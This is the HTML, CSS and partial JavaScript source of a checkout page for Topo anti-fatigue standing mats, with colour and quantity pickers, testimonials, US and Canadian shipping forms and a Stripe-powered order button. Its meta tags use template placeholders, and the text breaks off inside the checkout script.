<!doctype html>
<html lang="en">
<head>
	<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<meta property="fb:admins" content="YOUR FB ADMIN" />
		<meta property="og:title" content="THE TITLE THAT SHOWS ON FB" />
    	<meta property="og:type" content="website" />
    	<meta property="og:site_name" content="YOUR SITE NAME" />
    	<meta property="og:url" content="http://yourdomain.com/page/" />
    	<meta property="og:image" content="LINK TO FB IMAGE [1200px by 630px]" />
    	<meta property="og:description" content="FB LINK DESCRIPTION" />
    	<title>PAGE TITLE THE BROWSER SHOWS</title>
    <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
	<style>
	
	body{
  background-image:url('https://s3.amazonaws.com/ergodriven/gray_jean-2.png');
  font: 18px roboto, sans;
  color:#000;
  font-weight:400;
  margin:0px;
  background-attachment:fixed;
}

#headerbar{
  background-color:white;
  position:relative;
  overflow:hidden;
  height:60px;
  box-shadow: 0 5px 3px -3px #ccc;
}

#storesquare{
  position:absolute;
  top:0;
  left:5px;
  height:60px;
}

#headertext{
  text-align:center;
  font-family: roboto,sans;
  font-size:34px;
  padding-top:5px;
}

.stepblocks{
  width:60%;
  max-width:800px;
  margin:auto auto;
  box-sizing:border-box;
  background-color:#fff;
  margin-bottom:10px;
  margin-top:20px;
  border-radius:5px;
  box-shadow: 0 5px 3px -3px #ccc;
  overflow:hidden;
  padding-bottom:10px;
}

.steptit{
  box-sizing:border-box;
  font-size:1.6em;
  text-align:center;
  background-color:#aaa;
  padding:5px;
  margin-bottom:20px;
}

.topowraps{
  display:inline;
  position:relative;
}

label > input{
  display:none;
}

label > input + img{ /* IMAGE STYLES */
  cursor:pointer;
  border:2px solid transparent;
  width:32%;
  box-sizing:border-box;
  background-color:#fff;
  padding:1%;
  border-radius:15px;
  opacity:0.7;
  transition: opacity ease 0.5s;
}

label > input + img.visible:hover{
 opacity:1;
}

label > input:checked + img.visible{ /* (CHECKED) IMAGE STYLES */
  border:5px solid #00A79D;
  opacity:1;
  transition: opacity .6s;
}

label > input:checked + img:hover{ /* (CHECKED) IMAGE STYLES */
  opacity:1;
  transition: opacity .6s;
}

#tw1{
  margin-left:1%;
}

#tw4{
  margin-left:17.5%;
}
	
label{position:relative;}

.qty{
  position:absolute;
  bottom:20%;
  left:0%;
  width:40%;
  box-sizing:border-box;
  background-color:white;
  padding:0 0 5px 5px;
  border-radius:5px;
  box-shadow:0 2px 4px -1px #000;
}

.qtyfi{
  font-size:2.5em;
  margin-top:5px;
  width:70%;
  border:none;
  text-align:center;
}

#qtybutts{
  width:20%;
  display:inline-block;
  vertical-align: bottom;
}

#plus, #minus{
  width:100%;
  cursor:pointer;
}

#plus:hover, #minus:hover{
  opacity:0.8;
  transition:none;
}
	
#formblock{
  box-sizing:border-box;
}

#formblock label.ffield{
  text-align:right;
  width:32%;
  float:left;
  padding-right:10px;
  color:#707070;
}

#formblock input{
  width:50%;
  box-sizing: border-box;
  font-size:1.1em;
  border-radius:5px;
  border:1px solid #aaa;
  padding-left:5px;
  box-shadow:inset 0 0 1px 1px #ccc;
  font-family:roboto,sans;
}

#formblock input:focus{
  border: 1px solid #000;
  box-shadow: none;
  box-shadow: 0 0 0px 1px #000;
  outline:none;
  box-sizing:border-box;
}

.styled-select select {
   background: transparent;
   width: 100%;
   padding-left: 0px;
   font-size: .9em;
   line-height: 1;
   border: 0;
   border-radius: 0;
   height: 28px;
   -webkit-appearance: none;
  -moz-appearance: none;
  font-family:roboto,sans;
   }

.styled-select {
   width: 25%;
   box-sizing:border-box;
   height: 28px;
   overflow: hidden;
   background: url('https://s3.amazonaws.com/ergodriven/DownArrow3.png') no-repeat right #fff;
   background-size: 30px 30px;
   background-color:#fff;
  border-radius:5px;
  font-family:roboto,sans;
  border:1px solid #aaa;
  padding-left:5px;
  box-shadow:inset 0 0 1px 1px #ccc;
   }
   
#state-select{
width:50%;
}

table{
  margin-left:20%;
  width:50%;
  box-sizing:border-box;
}

table .qtycell{
  text-align:left;
  padding-right:7px;
}

table .color{
  text-align:right;
  padding-right:0px;
}

table .dollars{
  text-align:left;
  padding-left:20px;
  border-left:2px dotted #aaa;
}

table .dollars strike{
  font-size:0.9em;
}

table .dollars span{
  color:#00A79D;
}

table .total{
  font-weight:700;
}

table .shipping{
  color:#707070;
}

#sec3{
  margin-bottom:100px;
}

#checkoutstuff{
  text-align:center;
  padding-top:20px;
  padding-bottom:10px;
}

#customButton{
  width:50%;
  margin:auto auto;
  background-color:#00A79D;
  background-image: linear-gradient(to bottom, rgba(255, 255, 255, 0.3), rgba(0, 0, 0, 0.2));
  border-radius:8px;
  height:50px;
  border:none;
  font: 22px roboto,sans;
  color:#fff;
  font-weight:400;
  cursor:pointer;
  transition: background-color 0.3s ease;
}

#customButton:hover{
  background-color: #00867E;
}

#customButton:active{
	outline:none;
	box-shadow: inset 0 0 10px 1px #000;
}

#customButton:focus{
	outline:none;
}

.security{
  font-size:10px;
  color:#aaa;
  margin-top:5px;
}

.security b{
  font-weight:700;
}
.topowraps img{opacity:0.01; transition: opacity .6s;}
.topowraps img.visible{opacity:1;}
.topowraps img.lessvisible{opacity:0.7;}

#contactus{
  position:fixed;
  right:0px;
  bottom:0px;
  padding:5px;
  padding-right:15px;
}

#contactus a{
  text-decoration: none;
  color:#aaa;
  transition: all 0.5s ease;
}

#contactus a:hover{
  color:#000;
}

#yoursavingstit, #yoursavings{
  padding-top:35px !important;
}

#creditr, #yoursavingsr{
color: #00A79D;
}

#emailerrorshow{
  color:red;
  text-align:center;
  margin-top: 25px;
}

#cotutvid {
    position: fixed;
    left: 0px;
    bottom: 0px;
    padding: 5px 5px 5px 15px;
}

#cotutvid a {
    text-decoration: none;
    color: #AAA;
    transition: all 0.5s ease 0s;
}

#cotutvid a:hover {
    color: #000;
}

#sec3{margin-bottom: 10px;}
#sec4{width:60%;max-width:800px;margin:auto auto;font-size:12px;overflow:hidden;margin-bottom:100px;}
#returns{width:51%;float:left;margin-left:1%;opacity:0.3;transition:all ease 0.3s;cursor:default;}
#security2{width:46%;float:right;Margin-right:1%;opacity:0.3;transition:all ease 0.3s;cursor:default;}
#returns:hover{opacity:0.5;}
#security2:hover{opacity:0.5;}
#sec4 span{font-weight:700;display:block;font-size:16px;}
#sec4 img{height:15px;margin-right: 10px;}
#customButton{height:70px;border-radius:5px;}
#cardsnblurb{width:50%;margin:auto auto;margin-top:10px;padding-bottom:30px;}
#ccards{width:48%;float:right;opacity:0.4;}
#security{float:left;width:48%;text-align:right;margin-top:0;}
#timelinepopup{display:none;position:fixed;width:400px;left:52%;top:50%;background-color:#fff;padding:15px;border-radius:5px;box-shadow:0 0 5px 5px #aaa;font-size:14px;}
.vistlpop{display:block !important;}
.hospan{display:inline-block;position:relative;height:16px;top:2px;opacity:0.7;margin-left:3px;cursor:pointer;}
.hospan:hover{opacity:1;}
html{min-width:900px;}.qty{min-width:100px;}

.stepblocks {border-radius: 0px;}
#customButton,#formblock input{border-radius:0px;}
.styled-select {border-radius: 0px;}

@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/QHD8zigcbDB8aPfIoaupKOvvDin1pK8aKteLpeZ5c0A.ttf) format('truetype');
}
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  src: local('Roboto Bold'), local('Roboto-Bold'), url(https://fonts.gstatic.com/s/roboto/v15/d-6IYplOFocCacKzxwXSOCZ2oysoEQEeKwjgmXLRnTc.ttf) format('truetype');
}

@media screen and (max-width: 900px){#cotutvid,#contactus{display:none}}

/**********************************************************************************/
/**********************************************************************************/
/*********BEGIN GENERAL MOBILE STYLING************/
/**********************************************************************************/
/**********************************************************************************/

@media screen and (max-device-width: 1100px){
#headerbar, #contactus, #cotutvid, #reviewslink,#timelinepopup, .hospan{display:none}
html{min-width:0px !important;}.qty{min-width:0px !important;}

#sec4{display:none !important}

.stepblocks{
width:100%;
border-radius:0px;
margin:0;
box-shadow:none;
}

.qty {
    position: absolute;
    bottom: 30%;
    left: 105%;
    width: 80%;
    height:700%;
    box-sizing: border-box;
    background-color: rgba(255,255,255,0);
  text-align:left;
    padding: 0px 0px 0px 0px;
    border-radius: 15px;
    box-shadow: none;
  font-size:16px;
}

.qtyfi {
    font-size: 40px;
    margin-top: 0px;
    width: 70%;
    border: none;
    text-align: center;
  background-color: rgba(0,0,0,0);
}

#qtybutts{
  width:100%;
  position:relative;
}

#plus{
  width:40%;
  float:right;
}

#minus{
  width:40%;
  float:left;
  position:absolute;
  left:0;
  bottom:39%;
}

#formblock{
width:90%;
margin:auto auto;
}

#formblock label.ffield{
  width:100%;
  text-align:left;
}

#formblock input{
  width:100%;
  font-size:1.1em;
  border-radius:5px;
  border:1px solid #aaa;
  padding-left:5px;
  box-shadow:inset 0 0 1px 1px #ccc;
}

.steptit{
font-size:1.4em;
}

.styled-select select {
   font-size: 1.2em;
   height: 35px;
   -webkit-appearance: none;
  -moz-appearance: none;
   }

.styled-select {
   width: 100%;
   height: 35px;
   background-size: 35px 37px;
   }
#state-select{
width:100%;
}

table{
  width:100%;
  margin-left:0;
}

td.color{
  width:55%;
}

td.dollars{
  width:40%;
}

#customButton{
  width:100%;
  height:85px;
  border-radius:0px;
  font-size:24px;
}

#sec3{
	margin-bottom:0px;
	padding-bottom:0;
}

#securitymob{
	display:block !important;
	color:#ccc;
}

#cardsnblurb{
	display:none !important;
}

#checkoutstuff{
	padding-bottom:0;
}

#qtyBlackm, #qtyGreym, #qtyBluem, #qtyPurplem, #qtyGreenm{
  font-size:18px;
  position:absolute;
  bottom:170%;
  width:70%;
  left:12%;
  color:white;
}

#discnotify{
  margin-top:10px !important;
  margin-bottom:10px;
  font-size:1.2em;
  padding: 0 5px 0 5px;
}

#outofstockbottom{width:100%;}
}

/**********************************************************************************/
/**********************************************************************************/
/*********BEGIN LANDSCAPE MOBILE STYLING************/
/**********************************************************************************/
/**********************************************************************************/

@media screen and (max-device-width: 1100px) and (orientation:landscape){
#qtyBlackm, #qtyGreym, #qtyBluem, #qtyPurplem, #qtyGreenm{
  font-size:24px;
  position:absolute;
  bottom:320%;
  width:70%;
  left:14%;
  color:white;
}
}

/**********************************************************************************/
/**********************************************************************************/
/*********BEGIN PORTRAIT IPAD STYLING************/
/**********************************************************************************/
/**********************************************************************************/

@media screen and (min-device-width: 768px) and (max-device-width: 1100px) and (orientation:portrait){
.steptit{
font-size:2em;
}

#qtyBlackm, #qtyGreym, #qtyBluem, #qtyPurplem, #qtyGreenm{
  font-size:24px;
  position:absolute;
  bottom:320%;
  width:70%;
  left:14%;
  color:white;
}
}

/**********************************************************************************/
/**********************************************************************************/
/*********BEGIN LANDSCAPE IPAD STYLING************/
/**********************************************************************************/
/**********************************************************************************/

@media screen and (min-device-width: 768px) and (max-device-width: 1100px) and (orientation:landscape){
.steptit{
font-size:2em;
}

#qtyBlackm, #qtyGreym, #qtyBluem, #qtyPurplem, #qtyGreenm{
  font-size:24px;
  position:absolute;
  bottom:320%;
  width:70%;
  left:14%;
  color:white;
}

.stepblocks{
  width:100%;
  max-width:800px;
  margin:auto auto;
  box-sizing:border-box;
  background-color:#fff;
  margin-bottom:10px;
  margin-top:20px;
  border-radius:10px;
  box-shadow: 0 5px 3px -3px #ccc;
  overflow:hidden;
  padding-bottom:10px;
}

html{
padding-bottom:100px;
}

#customButton{
  width:60%;
  height:75px;
  border-radius:5px;
  margin-bottom:20px;
  font-size:28px;
}
}

#discnotify{
  text-align:center;
  margin-top:20px;
  font-size:1.5em;
  color:#00A79D;
  text-shadow:
   -1px -1px 0 #fff,  
    1px -1px 0 #fff,
    -1px 1px 0 #fff,
     1px 1px 0 #fff;
}

#discnotify2{
  text-align:center;
  margin-top:10px;
  margin-bottom:10px;
  font-size:1em;
  color:#00A79D;
}

#discnotify2 p{
  font-size:.7em;
  margin-top:0;
}

.tmvisi{display:block !important;}

#reviewslink{text-align:right;margin:-5px 10px -5px auto;padding:0;opacity:0;transition:all ease 1s;width:200px;}
#reviewslink:hover{opacity:1;cursor:pointer;transition:all ease 0.2s;}

#testimonialsgroup{width:60%;margin:auto auto;}
.testmain{width:49%;overflow:hidden;background-color:#fff;margin-bottom: 2%;position:relative;}
.tmleft{float:left;}
.tmright{float:right;}
.testpic{width:25%;float:left;margin-right:5px;}
img.testpic{width:100%;}
.testblurb{padding:5px 5px 0 0;font-size:12px;border-top:1px solid #58595B;}
.testblurb>p{text-align:right;margin-bottom:0;position:absolute;color:#aaa;right:5px;bottom:5px;}
.qty>span{font-size:14px;color:#f25f5c;}
#outofstock{width:90%;margin:auto auto;margin-top:10px;margin-bottom:10px;padding:10px;box-sizing:border-box;border:1px solid #f25f5c;
color:#f25f5c;border-radius:5px;text-align:center;}
#outofstockbottom{width:50%;margin:auto auto;margin-top:10px;padding:5px;box-sizing:border-box;border:1px solid #f25f5c;
color:#f25f5c;border-radius:5px;text-align:center;}
/* 
@media screen and (min-width: 1100px){
label > input + img{position:relative;z-index:2;}
.qty{z-index:3;}
.qtyremBlock{display:block !important;position:absolute;bottom:400%;left:24%;width:50%;overflow:hidden;text-align:center;box-sizing:border-box;font-size:50px;opacity:1;z-index:1;}
.qtyremBlock span{display:block;font-size:15px;}
}
 */
	
	</style>
	<script src="https://checkout.stripe.com/checkout.js"></script>
  </head>
<body>
<div id="headerbar">
	<img src="https://s3.amazonaws.com/ergodriven/profile-logo-04-small-compressor-2.png" id="storesquare" title="squarelogo"/>
	<div id="headertext">Better Standing is Just a Step Away</div>
</div>
<div id="discnotify" style="display:none">Your $20 credit will be applied to each mat <i>in this order only.</i></div>
<div id="sec1" class="stepblocks">
	<div id="sectit1" class="steptit">1. Choose Your Color(s)</div>
	<div id="tw1" class="topowraps">
		<label class="topos">
  			<input type="checkbox" id="black" name="black" value="black" onclick="showMe()"/>
  			<img id="t1" src="https://s3.amazonaws.com/ergodriven/TopoColorBlack-compressor.png" title="Obsidian Black"/>
		</label>
		<div id="qtyBlack" class="qty" style="display:none">QTY Black<input type='text' id='qtyfblack' name='qtyblackin' min='0' value='0' class='qtyfi' readonly='readonly'/><div id="qtybutts"><img id="plus" src="https://s3.amazonaws.com/ergodriven/PlusButton.png" onclick='javascript: addQtyblack();' class="visible"/><img id="minus" src="https://s3.amazonaws.com/ergodriven/MinusButton.png" onclick='javascript: subtractQtyblack();' class="visible"/></div></div>
		<div id="qtyBlackm" style="display:none">#Black<div class="styled-select" id="blackmobi" title="Obsidian Black Qty">
																	<select id="qtyfblackm" onchange="calcTotals()">
																		<option selected="selected" value="0">0</option>
																		<option value="1">1</option>
																		<option value="2">2</option>
																		<option value="3">3</option>
																		<option value="4">4</option>
																		<option value="5">5</option>
																		<option value="6">6</option>
																		<option value="7">7</option>
																		<option value="8">8</option>
																		<option value="9">9</option>
																		<option value="10">10</option>
																		<option value="11">11</option>
																		<option value="12">12</option>
																		<option value="13">13</option>
																		<option value="14">14</option>
																		<option value="15">15</option>
																		<option value="16">16</option>
																		<option value="17">17</option>
																		<option value="18">18</option>
																		<option value="19">19</option>
																		<option value="20">20</option>
																	</select>
	</div>
	</div>
	</div>
	<div id="tw2" class="topowraps">
		<label class="topos">
  			<input type="checkbox" id="grey" name="grey" value="grey" onclick="showMe()"/>
  			<img id="t2" src="https://s3.amazonaws.com/ergodriven/TopoColorGrey-compressor.png" title="Altostratus Grey"/>
		</label>
		<div id="qtyGrey" class="qty" style="display:none">QTY Grey<!-- <br/><span>Ships 12/15</span> --><input type='text' id='qtyfgrey' name='qtygreyin' min='0' value='0' class='qtyfi' readonly='readonly'/><div id="qtybutts"><img id="plus" src="https://s3.amazonaws.com/ergodriven/PlusButton.png" onclick='javascript: addQtygrey();' class="visible"/><img id="minus" src="https://s3.amazonaws.com/ergodriven/MinusButton.png" onclick='javascript: subtractQtygrey();' class="visible"/></div></div>
		<div id="qtyGreym" style="display:none">#Grey<div class="styled-select" id="greymobi">
																	<select id="qtyfgreym" onchange="calcTotals()">
																		<option selected="selected" value="0">0</option>
																		<option value="1">1</option>
																		<option value="2">2</option>
																		<option value="3">3</option>
																		<option value="4">4</option>
																		<option value="5">5</option>
																		<option value="6">6</option>
																		<option value="7">7</option>
																		<option value="8">8</option>
																		<option value="9">9</option>
																		<option value="10">10</option>
																		<option value="11">11</option>
																		<option value="12">12</option>
																		<option value="13">13</option>
																		<option value="14">14</option>
																		<option value="15">15</option>
																		<option value="16">16</option>
																		<option value="17">17</option>
																		<option value="18">18</option>
																		<option value="19">19</option>
																		<option value="20">20</option>
																	</select>
	</div>
	</div>
	</div>
	<div id="tw3" class="topowraps">
		<label class="topos">
  			<input type="checkbox" id="blue" name="blue" value="blue" onclick="showMe()"/>
  			<img id="t3" src="https://s3.amazonaws.com/ergodriven/TopoColorBlue-compressor.png" title="Denim Blue"/>
		</label>
		<div id="qtyBlue" class="qty" style="display:none">QTY Blue<!-- <br/><span>Ships 12/15</span> --><input type='text' id='qtyfblue' name='qtybluein' min='0' value='0' class='qtyfi' readonly='readonly'/><div id="qtybutts"><img id="plus" src="https://s3.amazonaws.com/ergodriven/PlusButton.png" onclick='javascript: addQtyblue();' class="visible"/><img id="minus" src="https://s3.amazonaws.com/ergodriven/MinusButton.png" onclick='javascript: subtractQtyblue();' class="visible"/></div></div>
		<div id="qtyBluem" style="display:none">#Blue<div class="styled-select" id="bluemobi">
																	<select id="qtyfbluem" onchange="calcTotals()">
																		<option selected="selected" value="0">0</option>
																		<option value="1">1</option>
																		<option value="2">2</option>
																		<option value="3">3</option>
																		<option value="4">4</option>
																		<option value="5">5</option>
																		<option value="6">6</option>
																		<option value="7">7</option>
																		<option value="8">8</option>
																		<option value="9">9</option>
																		<option value="10">10</option>
																		<option value="11">11</option>
																		<option value="12">12</option>
																		<option value="13">13</option>
																		<option value="14">14</option>
																		<option value="15">15</option>
																		<option value="16">16</option>
																		<option value="17">17</option>
																		<option value="18">18</option>
																		<option value="19">19</option>
																		<option value="20">20</option>
																	</select>
	</div>
	</div>
	</div>
	<div id="tw4" class="topowraps">
		<label class="topos">
  			<input type="checkbox" id="purple" name="purple" value="purple" onclick="showMe()"/>
  			<img id="t4" src="https://s3.amazonaws.com/ergodriven/TopoColorPurple-compressor.png" title="Mulberry Purple"/>
		</label>
		<div id="qtyPurple" class="qty" style="display:none">QTY Purple<!-- <br/><span>Ships 12/15</span> --><input type='text' id='qtyfpurple' name='qtypurplein' min='0' value='0' class='qtyfi' readonly='readonly'/><div id="qtybutts"><img id="plus" src="https://s3.amazonaws.com/ergodriven/PlusButton.png" onclick='javascript: addQtypurple();' class="visible"/><img id="minus" src="https://s3.amazonaws.com/ergodriven/MinusButton.png" onclick='javascript: subtractQtypurple();' class="visible"/></div></div>
		<div id="qtyPurplem" style="display:none">#Purple<div class="styled-select" id="purplemobi">
																	<select id="qtyfpurplem" onchange="calcTotals()">
																		<option selected="selected" value="0">0</option>
																		<option value="1">1</option>
																		<option value="2">2</option>
																		<option value="3">3</option>
																		<option value="4">4</option>
																		<option value="5">5</option>
																		<option value="6">6</option>
																		<option value="7">7</option>
																		<option value="8">8</option>
																		<option value="9">9</option>
																		<option value="10">10</option>
																		<option value="11">11</option>
																		<option value="12">12</option>
																		<option value="13">13</option>
																		<option value="14">14</option>
																		<option value="15">15</option>
																		<option value="16">16</option>
																		<option value="17">17</option>
																		<option value="18">18</option>
																		<option value="19">19</option>
																		<option value="20">20</option>
																	</select>
	</div>
	</div>
	</div>
	<div id="tw5" class="topowraps">
		<label class="topos">
  			<input type="checkbox" id="green" name="green" value="green" onclick="showMe()"/>
  			<img id="t5" src="https://s3.amazonaws.com/ergodriven/TopoColorGreen-compressor.png" title="Evergreen"/>
		</label>
		<div id="qtyGreen" class="qty" style="display:none">QTY Green<!-- <br/><span>Ships 12/15</span> --><input type='text' id='qtyfgreen' name='qtygreenin' min='0' value='0' class='qtyfi' readonly='readonly'/><div id="qtybutts"><img id="plus" src="https://s3.amazonaws.com/ergodriven/PlusButton.png" onclick='javascript: addQtygreen();' class="visible"/><img id="minus" src="https://s3.amazonaws.com/ergodriven/MinusButton.png" onclick='javascript: subtractQtygreen();' class="visible"/></div></div>
		<div id="qtyGreenm" style="display:none">#Green<div class="styled-select" id="greenmobi">
																	<select id="qtyfgreenm" onchange="calcTotals()">
																		<option selected="selected" value="0">0</option>
																		<option value="1">1</option>
																		<option value="2">2</option>
																		<option value="3">3</option>
																		<option value="4">4</option>
																		<option value="5">5</option>
																		<option value="6">6</option>
																		<option value="7">7</option>
																		<option value="8">8</option>
																		<option value="9">9</option>
																		<option value="10">10</option>
																		<option value="11">11</option>
																		<option value="12">12</option>
																		<option value="13">13</option>
																		<option value="14">14</option>
																		<option value="15">15</option>
																		<option value="16">16</option>
																		<option value="17">17</option>
																		<option value="18">18</option>
																		<option value="19">19</option>
																		<option value="20">20</option>
																	</select>
	</div>
	</div>
	</div>
	<div id="reviewslink">Testimonials</div>
</div>
<div id="testimonialsgroup" style="display:none">
	<div class="testmain tmleft" id="collin">
		<div class="testpic"><img src="https://s3.amazonaws.com/ergodriven/collin-compressor-2.jpg" class="testpic" alt="topo standing desk anti-fatigue mat not flat calculated terrain comments" /></div>
		<div class="testblurb">"Topo unlocks a ton of new standing work positions. I feel great. This is Jason Bourne's standing mat."<p>Collin | Ergo Depot</p></div>
	</div>
	<div class="testmain tmright" id="matt">
		<div class="testpic"><img src="https://s3.amazonaws.com/ergodriven/Matt-min.jpg" class="testpic" alt="topo standing desk anti-fatigue mat not flat calculated terrain testimonials" /></div>
		<div class="testblurb">"Awesome mat. I used to rarely raise up my sit-stand desk, but this mat has helped me keep it standing all day. I like the front two raised sections and the tear drop center."<p>Matt | Box</p></div>
	</div>
	<div class="testmain tmleft" id="kale">
		<div class="testpic"><img src="https://s3.amazonaws.com/ergodriven/Kale-min.jpg" class="testpic" alt="topo standing desk anti-fatigue mat not flat calculated terrain testimonial" /></div>
		<div class="testblurb">"Why hasn't someone thought of this sooner? I like how my feet seem to keep moving while working, and it helps me stand longer."<p>Kale | 23andMe</p></div>
	</div>
	<div class="testmain tmright" id="dustin">
		<div class="testpic"><img src="https://s3.amazonaws.com/ergodriven/Heba-min.jpg" class="testpic" alt="topo standing desk anti-fatigue mat not flat calculated terrain feedback" /></div>
		<div class="testblurb">"I love this mat! It's also a great stretching tool after a long day of work and ballet class."<p>Heba | Ballet Studio Owner</p></div>
	</div>
</div>
<div id="sec2" class="stepblocks" style="display:none">
	<div id="sectit2" class="steptit">2. Enter Your Shipping Info</div>
	<div id="formblock">
	<form id="geninfo">
		<p><label class="ffield" id="fullnamel">Full Name</label><input type="text" name="fullname" id="fullname" placeholder="First Last"/></p>
		<p><label class="ffield" id="emaill">Email Address</label><input type="email" name="email" id="email" placeholder="user@email.com" onblur="checkEmail()"/></p>
		<p><label class="ffield" id="countryl">Country</label><div class="styled-select"><select id="country" onchange="showAddForm()">
			<option selected="selected" value="us">USA</option>
			<option value="ca">Canada</option>
		</select></div></p>
	</form>
	<form id="USA">
		<p><label class="ffield" id="add1l">Address Line 1</label><input type="text" name="add1" id="add1" placeholder="123 Main St."/></p>
		<p><label class="ffield" id="add2l">Address Line 2</label><input type="text" name="add2" id="add2" placeholder="Apt 12"/></p>
		<p><label class="ffield" id="cityl">City</label><input type="text" name="city" id="city" placeholder="Anytown" onfocus="clearAddLine2()"/></p>
		<p><label class="ffield">State</label><div class="styled-select" id="state-select"><select id="state" onchange="calcTotals()">
			<option value="AL">Alabama</option>
			<option value="AK">Alaska</option>
			<option value="AZ">Arizona</option>
			<option value="AR">Arkansas</option>
			<option value="CA">California</option>
			<option value="CO">Colorado</option>
			<option value="CT">Connecticut</option>
			<option value="DE">Delaware</option>
			<option value="DC">District Of Columbia</option>
			<option value="FL">Florida</option>
			<option value="GA">Georgia</option>
			<option value="HI">Hawaii</option>
			<option value="ID">Idaho</option>
			<option value="IL">Illinois</option>
			<option value="IN">Indiana</option>
			<option value="IA">Iowa</option>
			<option value="KS">Kansas</option>
			<option value="KY">Kentucky</option>
			<option value="LA">Louisiana</option>
			<option value="ME">Maine</option>
			<option value="MD">Maryland</option>
			<option value="MA">Massachusetts</option>
			<option value="MI">Michigan</option>
			<option value="MN">Minnesota</option>
			<option value="MS">Mississippi</option>
			<option value="MO">Missouri</option>
			<option value="MT">Montana</option>
			<option value="NE">Nebraska</option>
			<option value="NV">Nevada</option>
			<option value="NH">New Hampshire</option>
			<option value="NJ">New Jersey</option>
			<option value="NM">New Mexico</option>
			<option value="NY">New York</option>
			<option value="NC">North Carolina</option>
			<option value="ND">North Dakota</option>
			<option value="OH">Ohio</option>
			<option value="OK">Oklahoma</option>
			<option value="OR">Oregon</option>
			<option value="PA">Pennsylvania</option>
			<option value="RI">Rhode Island</option>
			<option value="SC">South Carolina</option>
			<option value="SD">South Dakota</option>
			<option value="TN">Tennessee</option>
			<option value="TX">Texas</option>
			<option value="UT">Utah</option>
			<option value="VT">Vermont</option>
			<option value="VA">Virginia</option>
			<option value="WA">Washington</option>
			<option value="WV">West Virginia</option>
			<option value="WI">Wisconsin</option>
			<option value="WY">Wyoming</option>
			<option value="AS">American Samoa</option>
			<option value="GU">Guam</option>
			<option value="MP">Northern Mariana Islands</option>
			<option value="PR">Puerto Rico</option>
			<option value="UM">United States Minor Outlying Islands</option>
			<option value="VI">Virgin Islands</option>
			<option value="AA">Armed Forces Americas</option>
			<option value="AP">Armed Forces Pacific</option>
			<option value="AE">Armed Forces Others</option>	
		</select></div></p>
		<p><label class="ffield" id="zipl">Zip Code</label><input type="number" name="zip" id="zip" placeholder="12345"/></p>
		<p><label class="ffield" id="phonel">Phone Number</label><input type="tel" name="phone" id="phone" placeholder="408-555-1234"/></p>
	</form>
	<form id="CAN" style="display:none;">
		<p><label class="ffield" id="add1l">Address Line 1</label><input type="text" name="add1" id="add1ca" placeholder="123 Main St."/></p>
		<p><label class="ffield" id="add2l">Address Line 2</label><input type="text" name="add2" class="add2" id="add2ca"/></p>
		<p><label class="ffield" id="cityl">City</label><input type="text" name="city" id="cityca" placeholder="Anytown" onfocus="clearAddLine2()"/></p>
		<p><label class="ffield">Province</label><div class="styled-select" id="state-select"><select id="stateca">
			<option value="AB">Alberta</option>
			<option value="BC">British Columbia</option>
			<option value="MB">Manitoba</option>
			<option value="NB">New Brunswick</option>
			<option value="NL">Newfoundland and Labrador</option>
			<option value="NS">Nova Scotia</option>
			<option value="ON">Ontario</option>
			<option value="PE">Prince Edward Island</option>
			<option value="QC">Quebec</option>
			<option value="SK">Saskatchewan</option>
			<option value="NT">Northwest Territories</option>
			<option value="NU">Nunavut</option>
			<option value="YT">Yukon</option>
		</select></div></p>
		<p><label class="ffield" id="zipl">Postal Code</label><input type="text" name="zip" id="zipca" placeholder="12345"/></p>
		<p><label class="ffield" id="phonel">Phone Number</label><input type="tel" name="phone" id="phoneca" placeholder="408-555-1234"/></p>
	</form>
</div>
</div>
<div id="sec3" class="stepblocks" style="display:none">
	<div id="sectit2" class="steptit">3. Review and Checkout</div>
	<div id="discnotify2" style="display:none">Your credit has been applied to each mat.<br/></div>
	<table>
		<tr class="product" id="blackr" style="display:none;">
			<td class="color">Obsidian Black x</td>
			<td class="qtycell" id="blackq">0</td>
			<td class="dollars" id="blacktotal">$0</td>
		</tr>
		<tr class="product" id="greyr" style="display:none;">
			<td class="color">Altostratus Grey x</td>
			<td class="qtycell" id="greyq">0</td>
			<td class="dollars" id="greytotal">$0</td>
		</tr>
		<tr class="product" id="bluer" style="display:none;">
			<td class="color">Denim Blue x</td>
			<td class="qtycell" id="blueq">0</td>
			<td class="dollars" id="bluetotal">$0</td>
		</tr>
		<tr class="product" id="purpler" style="display:none;">
			<td class="color">Mulberry Purple x</td>
			<td class="qtycell" id="purpleq">0</td>
			<td class="dollars" id="purpletotal">$0</td>
		</tr>
		<tr class="product" id="greenr" style="display:none;">
			<td class="color">Evergreen x</td>
			<td class="qtycell" id="greenq">0</td>
			<td class="dollars" id="greentotal">$0</td>
		</tr>
		<tr class="credit" style="display:none;" id="yoursavingsr">
			<td id="yoursavingstit" class="color">Your Savings Today</td>
			<td></td>
			<td class="dollars" id="yoursavings">$0</td>
		</tr>
		<tr class="savings" style="display:none;" id="savingsr">
			<td id="savingstit" class="color">Subtotal</td>
			<td></td>
			<td class="dollars" id="savings">$0</td>
		</tr>
		<tr class="credit" style="display:none;" id="creditr">
			<td id="credittit" class="color">Your One-Time Credit</td>
			<td></td>
			<td class="dollars" id="credit">$0</td>
		</tr>
		<tr class="salestax" style="display:none;" id="salestaxr">
			<td class="color">Sales Tax</td>
			<td></td>
			<td class="dollars" id="salestax">$0</td>
		</tr>
		<tr class="shipping">
			<td class="color" id="shiptype">US Shipping (12/3<img class="hospan" src="https://s3.amazonaws.com/ergodriven/InfoIcon-2.png"/>)</td>
			<td></td>
			<td class="dollars" id="shippingcost">$0</td>
		</tr>
		<tr class="total">
			<td class="color">Total</td>
			<td></td>
			<td class="dollars" id="totaldollars">$0</td>
		</tr>
	</table>
	<div id="finaldollars" style="display:none";></div>
	<div id="emailerrorshow" style="display:none">Email address field has an error.</div>
	<div id="checkoutstuff">
		<button id="customButton">Place Your Order Now<div id="securitymob" class="security" style="display:none">256-bit encryption powered by <b>stripe</b>.</div></button>
		<div id="cardsnblurb">
			<div id="security" class="security">Protected with 256-bit encryption powered by <b>stripe</b>.</div>
			<img src="https://s3.amazonaws.com/ergodriven/CreditCards-2.png" id="ccards">
		</div>
<form id="payment-form" action="https://yourdomain.com/order-succeeded/index.php" method="POST">
 <script>
 
    $('#customButton').click(function(){
      	var finalDollars = document.getElementById("finaldollars").value;
